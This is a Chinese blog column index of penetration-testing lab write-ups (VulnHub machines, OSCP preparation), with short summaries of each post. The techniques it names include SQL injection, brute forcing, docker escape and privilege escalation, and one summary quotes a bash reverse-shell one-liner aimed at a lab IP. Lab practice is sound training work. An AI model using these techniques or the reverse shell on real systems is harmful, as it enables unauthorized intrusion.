靶场之路,报错大师ruturn404的网络警犬练习记录
文章平均质量分 85
备考oscp的辛酸历程
朝阳Ruler
自强不息,厚德载物
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
vulnhub靶机渗透:PWNLAB: INIT
以下是该代码,我们使用strings查看msg2root,这里有一个/bin/echo %s >> /root/messages.txt。这里是能切换到kane用户的,然后这里有个文件有点可疑 find / -perm -4000 2>/dev/null。这个文件看完了就是只允许上传(".jpg",".jpeg",".gif",".png")四种类型文件,白名单。说是在内联网上上传和共享图片文件,应该是制作图片马,这里不出意外是爆破登录后台然后上传木马了,试试。这里连接一下mysql,查看一下信息。原创 2025-07-07 17:48:40 · 804 阅读 · 0 评论 -
Vulnhub-TommyBoy1dot0
1、只有tom(大汤姆)有登录的密码 2、有一个 callahanbak.bak 的备份文件,需要你将其重命名为index.html 3、有一个ftp服务,放在一个大多数扫描器都扫不到的端口上,每过15分钟上线 4、nick重置了它的账号为,nickburns sup3rl33t这是nick的密钥。这里重启了几次才能访问wp这个站点,那我们就继续渗透了,然后这个是个wp站,我们扫一下,看看有没有什么信息。淦,看的云里雾里的 这里看了其他师傅wp,说是通过手机访问,那我们就加一个ua头。原创 2025-06-26 12:17:40 · 738 阅读 · 0 评论 -
vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。
ok,转发成功,这里反弹一个shell,因为这个是docker环境,不能做什么操作 bash -i >& /dev/tcp/192.168.66.129/7777 0>&1 这里出了点问题,就是我的kali端口转发后访问127.0.0.1:8022端口后的页面关闭了之后就再也无法访问了,这里就借鉴其他师傅的wp了。ok,这里扫出来两个端口,一个8000端口一个22端口,我们先看看8000端口有什么东西。ok,这里找到了个ip,应该和上台靶机一样的 老规矩,探测一下内网存活i。怪可爱的,msf的logo。原创 2025-06-15 17:12:03 · 468 阅读 · 0 评论 -
vulnerable_docker_containement(easy难度)Frp、reGeorg隧道搭建内网穿透、docker逃逸、wpscan爆破。教学谈不上,纯技术分享
摘要:本文记录了一次针对Docker容器的渗透测试过程。通过端口扫描发现开放的Docker API(2375端口)和WordPress网站(8000端口)。利用wpscan爆破获取WordPress后台权限后,通过404.php获取初始shell。发现目标为Docker容器后,使用socat建立反向shell,并通过Linpeas脚本进行内网探测。随后使用frp进行内网穿透,发现172.18.0.3的8022端口开放Node.js服务。最后利用Docker Remote API未授权访问漏洞成功逃逸容器获取原创 2025-06-12 19:49:48 · 750 阅读 · 0 评论 -
Vulnhub_Zico2_wp
该渗透测试过程包括主机发现、端口扫描、目录爆破等步骤,发现目标开放80、22、111等端口。通过弱口令进入adbadmin后台,利用LFI+数据库漏洞创建test.php文件并植入木马,成功获取shell权限。最后利用sudo权限的文件进行提权,通过tarcf命令执行/bin/bash实现root权限获取。整个过程展示了从外网打点到权限提升的完整渗透路径。原创 2025-05-28 16:55:26 · 449 阅读 · 0 评论 -
WebDeveloper 流量分析、sudo提权,靶场通关WP
做到这里我还有一个信息漏掉了,22端口,还没尝试这个端口是干嘛的 这里还是找配置文件 这里爆除了数据库文件。这里来一条shell,这里有个小坑,就是前文已经给了闭合符号记得删除闭合符号即可 还有一件事就是这里不要乱点更新,因为插入php代码再新版本已经删除了,不要乱点!进来了,对编码有点不敏感,最近靶机打的太少了,因该多补补,为什么说我很熟悉wp呢,因为我的博客也是wp搭建的。提权成功,但是我没有安装自己的方式去提权,等后面有时间会把这个坑补上,但也加深了这个提权的方式。这个一眼wp,这个页面没啥东西的。原创 2025-05-01 19:19:17 · 638 阅读 · 0 评论 -
DC-2寻找Flag1、2、3、4、5,wpscan爆破、git提权
a#使用并添加环境变量,将/bin 作为PATH环境变量导出export PATH=$PATH:/bin/ #将/usr/bin作为PATH环境变量导出export PATH=$PATH:/usr/bin。如果访问重定向报错记得在/etc/hosts中添加ip即可,在windows中的C:/Windows/System32/drivers/etc/HOSTS中添加ip dc-2即可成功。不过这里我们遇到了-rbash,这个含义就是说我们的bash是不完整的,很多命令无法执行,无法操作,我们需要绕过。原创 2025-04-23 17:06:42 · 531 阅读 · 0 评论 -
Vulnstack 红日安全内网靶场(一)外网打点,内网渗透、横向、提权,mimikatz、CS,一台非常不错的靶机
Vulnstack 红日安全内网靶场(一)外网打点,内网渗透、横向、提权,mimikatz、CS,一台非常不错的靶机原创 2025-04-23 01:08:21 · 1254 阅读 · 0 评论 -
Metasploitable2-Linux。关于老师给了任务,一位彦祖返回家无私奉献,打穿靶场的故事。手搓+msf提权漏洞利用
端口21vsftpd2.3.4笑脸后门漏洞22弱口令23弱口令25 CNNVD-200111-00453 ISC BIND80 http111 rpcbind139/445 smb512 rexec(远程计算机上运行命令)爆破1099 java-rmi1524 bind_shell2049 nfs2121 ftp3306 mysql3632 distccd5432 postgresql5900 vnc6667/6697 irc8009 ajp8180 tomcat示例原创 2025-04-07 23:22:19 · 1249 阅读 · 0 评论 -
Vulnhub-靶机-Oz。一台让人做呕的靶机,不要换平台打靶机
sqlmap -u "http://192.168.66.133/users" --dbs --batch 这一步我没成功,我从扫描目录哪里就感觉这台靶机有问题,因为users目录没扫出来,后面又是这个sqlmap无法注入,可能需要去htb打吧,不知道咋回事 这里我就截个图,在网上扒一个,下次打htb靶机直接去官网,就不下载下来了 最终账户和密码为:wizard.oz:wizardofoz22。这里我们发现扫描出来的目录回显404,回显200的长度为0,我们用wfuzz扫描返回200长度0的来枚举目录。原创 2025-04-03 18:53:45 · 958 阅读 · 0 评论 -
Vulnhub-PrinkysPalacev3
arp-scan -l 扫描同网段。原创 2025-04-03 15:42:39 · 757 阅读 · 0 评论 -
vulnhub-Node1
vulnhub-Node1原创 2025-03-29 17:44:11 · 445 阅读 · 0 评论 -
《Tr0ll2 靶机渗透实战:弱口令+SUID+两种缓冲区溢出+ 提权完整+fcrackzip暴力破解+shellshock漏洞+脏牛三种root提权复盘》
《Tr0ll2 靶机渗透实战:弱口令+SUID+两种缓冲区溢出+ 提权完整+fcrackzip暴力破解+shellshock漏洞+脏牛三种root提权复盘》原创 2025-03-27 18:00:48 · 793 阅读 · 0 评论 -
vulnhub-Tr0ll ssh爆破、wireshark流量分析,exp、寻找flag。思维导图带你清晰拿到所以flag
这里有一种思路就是跟着pacp文件走,就是他干了什么我们跟着做或许有收获,当然是因为80端口没信息,可能是兔子窝。这里后来看了wp次啊知道,这东西是访问端口,前四位是ip,第五位乘256加上第六位就是访问的端口。这里我们把这个目录下文件下载下来可以执行,然后多出了一个目录,我们再次访问。爷笑了,他说绝对不是gen哪个密码,靶机最怕这个,谁知道藏了什么东西。这里给爷整笑了,说是包含密码,结果密码是Pass.txt。这里找到了一些文字,没懂,是让我们找这个东西吧。两个文件夹,我们看看有什么信息。原创 2025-03-21 17:39:54 · 656 阅读 · 0 评论 -
vulnhub-IMF爆肝7小时,绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵
IMF爆肝7小时,绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵。这靶机你就打吧原创 2025-03-16 20:46:10 · 1194 阅读 · 0 评论 -
BSides-Vancouver-2018 ftp匿名访问、hydra爆破22端口、nc瑞士军刀、提权
BSides-Vancouver-2018 ftp匿名访问、hydra爆破22端口、nc瑞士军刀、提权原创 2025-03-15 11:48:31 · 592 阅读 · 0 评论 -
vulnhub-Hackme-隧道建立、SQL注入、详细解题、思路清晰。
vulnhub-Hackme-隧道建立、SQL注入、详细解题、思路清晰。原创 2025-03-14 16:53:52 · 1036 阅读 · 0 评论 -
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权原创 2025-03-11 20:05:15 · 875 阅读 · 0 评论 -
vulnhub靶场渗透之Stapler 8000字详解,多种方式任你挑选,sql注入、隧道建立、hadry爆破、内核漏洞利用。
vulnhub靶场渗透之Stapler 8000字详解,多种方式任你挑选,sql注入、隧道建立、hadry爆破、内核漏洞利用。原创 2025-03-07 19:11:29 · 1340 阅读 · 0 评论 -
vulnhub靶场渗透之SickOs1.2渗透教程,计划任务提权、chkrootkit提权
vulnhub靶场渗透之SickOs1.2渗透教程,计划任务提权、chkrootkit提权原创 2025-03-07 10:37:42 · 677 阅读 · 0 评论 -
*VulnHub-FristiLeaks:1.3暴力解法、细节解法,主打软硬都吃,隧道搭建、寻找exp、提权、只要你想没有做不到的姿势
*VulnHub-FristiLeaks:1.3暴力解法、细节解法,主打软硬都吃,隧道搭建、寻找exp、提权、只要你想没有做不到的姿势原创 2025-03-06 18:34:51 · 725 阅读 · 0 评论 -
靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root
说实话,最后提权用nc有点绕、抽象,但是相比之前打靶机确实有很大进步,得把反弹shell语法记住,这个很关键,nc也得再精进一点,这东西是真好用,砍瓜切菜很顶。原创 2025-03-04 00:04:21 · 656 阅读 · 0 评论 -
vulnhub-DC-9 SQL注入、“ssh端口敲门”、hydra爆破
vulnhub-DC-9 SQL注入、“ssh端口敲门”、hydra爆破原创 2025-03-12 17:05:43 · 856 阅读 · 0 评论 -
靶场之路-VulnHub-DC-6 nmap提权、kali爆破、shell反连
靶场之路-VulnHub-DC-6 nmap提权、kali爆破、shell反连原创 2025-03-05 10:13:18 · 1096 阅读 · 0 评论 -
靶场之路-Kioptix Level-5
靶场之路-Kioptix Level-5原创 2025-03-01 21:48:28 · 467 阅读 · 0 评论 -
靶场之路-Kioptix Level-4 SQL注入、udf提权、shell逃逸、受限shell绕过实战详细记录,不踩坑、不踩雷、顺顺利利打完靶,快点进来享受。
靶场之路-Kioptix Level-4 SQL注入、udf提权、shell逃逸、受限shell绕过实战详细记录,不踩坑、不踩雷、顺顺利利打完靶,快点进来享受。原创 2025-02-26 13:00:20 · 469 阅读 · 0 评论 -
靶场之路-Kioptix Level-3 详细脏牛提权解题流程
靶场之路-Kioptix Level-3 详细脏牛提权解题流程原创 2025-02-25 16:50:04 · 590 阅读 · 0 评论 -
靶场之路-Kioptix Level-2 渗透之路不可或缺的经验宝宝,赶紧点进来开始享受。详细打靶流程,替你踩坑。
靶场之路-Kioptix Level-2 渗透之路不可或缺的经验宝宝,赶紧点进来开始享受。详细打靶流程,替你踩坑。原创 2025-02-24 18:55:40 · 722 阅读 · 0 评论 -
靶场之路-Kioptix Level-1 mod_ssl 缓冲区溢出漏洞
NFS 与 samba 一样,也是在网络中实现文件共享的一种实现,但不支持 windows 平台,samba 是能够在任何支持 SMB 协议的主机之间共享文件的一种实现,当然也包括 windows。其次把打靶的流程也熟悉了一遍包括工具的使用,对于我这个喜欢啃书本的人来说,实战是非常有冲击感的,希望以此为始来见证我的渗透之路,走着。这里我们还是要设定参数的,首先我们选择了探测smaba版本的工具,输入options然后设置探测端口,再运行,我们得到了smaba版本号是2.2.1a。原创 2025-02-22 19:49:54 · 1142 阅读 · 0 评论
分享